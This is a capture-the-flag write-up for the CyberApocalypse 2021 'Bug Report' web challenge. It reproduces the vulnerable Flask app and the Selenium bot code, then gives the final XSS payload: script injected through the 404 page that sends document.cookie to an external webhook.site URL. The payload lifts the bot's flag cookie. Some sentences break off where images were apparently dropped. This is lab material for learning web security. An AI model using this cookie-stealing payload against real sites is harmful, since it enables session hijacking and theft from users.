CyberApocalypse Bug Report Writeup

SYS_DATE: 2021-04-26 00:00 | SIZE: 308 words
#Web #SSRF #XSS

Challenge

Solution

we are also given the source file here

which had the following

and the challenge

the two python scripts as follows

 1from flask import Flask, request, render_template
 2from urllib.parse import unquote
 3from bot import visit_report
 4
 5app = Flask(__name__)
 6
 7@app.route("/")
 8def index():
 9    return render_template("index.html")
10
11@app.route("/api/submit", methods=["POST"])
12def submit():
13    try:
14        url = request.json.get("url")
15        
16        assert(url.startswith('http://') or url.startswith('https://'))
17        visit_report(url)
18
19        return {"success": 1, "message": "Thank you for your valuable submition!"}
20    except:
21        return {"failure": 1, "message": "Something went wrong."}
22
23
24@app.errorhandler(404)
25def page_not_found(error): 
26    return "<h1>URL %s not found</h1><br/>" % unquote(request.url), 404
27
28app.run(host="0.0.0.0", port=1337)

brief look at it, nothing much it just forwards our reported url to the bot

but bot.py was interesting

 1from selenium import webdriver
 2from selenium.webdriver.chrome.options import Options
 3from selenium.webdriver.support.ui import WebDriverWait
 4
 5def visit_report(url):
 6
 7    options = Options()
 8    options.add_argument('headless')
 9    options.add_argument('no-sandbox')
10    options.add_argument('disable-dev-shm-usage')
11    options.add_argument('disable-infobars')
12    options.add_argument('disable-background-networking')
13    options.add_argument('disable-default-apps')
14    options.add_argument('disable-extensions')
15    options.add_argument('disable-gpu')
16    options.add_argument('disable-sync')
17    options.add_argument('disable-translate')
18    options.add_argument('hide-scrollbars')
19    options.add_argument('metrics-recording-only')
20    options.add_argument('mute-audio')
21    options.add_argument('no-first-run')
22    options.add_argument('dns-prefetch-disable')
23    options.add_argument('safebrowsing-disable-auto-update')
24    options.add_argument('media-cache-size=1')
25    options.add_argument('disk-cache-size=1')
26    options.add_argument('user-agent=BugHTB/1.0')
27    browser = webdriver.Chrome('chromedriver', options=options, service_args=['--verbose', '--log-path=/tmp/chromedriver.log'])
28
29    browser.get('http://127.0.0.1:1337/')
30
31    browser.add_cookie({
32        'name': 'flag',
33        'value': 'CHTB{f4k3_fl4g_f0r_t3st1ng}'
34    })
35
36    try:
37        browser.get(url)
38        WebDriverWait(browser, 5).until(lambda r: r.execute_script('return document.readyState') == 'complete')
39    except:
40        pass
41    finally:
42        browser.quit()

1browser.get('http://127.0.0.1:1337/')
2
3    browser.add_cookie({
4        'name': 'flag',
5        'value': 'CHTB{f4k3_fl4g_f0r_t3st1ng}'`

using this piece of code we can see that the bot visits the url sent and adds some cookies to it

with that i decided to use ssrf and xss,

ssrf by using the ip 127.0.0.1:1337 and xss using hookbin and an xss payload to steal the cookie

my final payload was

https://127.0.0.1:1337/<script>document.write('<img src="https://webhook.site/e923b472-7002-4b02-902d-61f0eedebbe9/?c='%2bdocument.cookie%2b'" />');</script>

as

and a few seconds later we got the flag leak on our hookbin instance

Flag : CHTB{th1s_1s_my_bug_r3p0rt}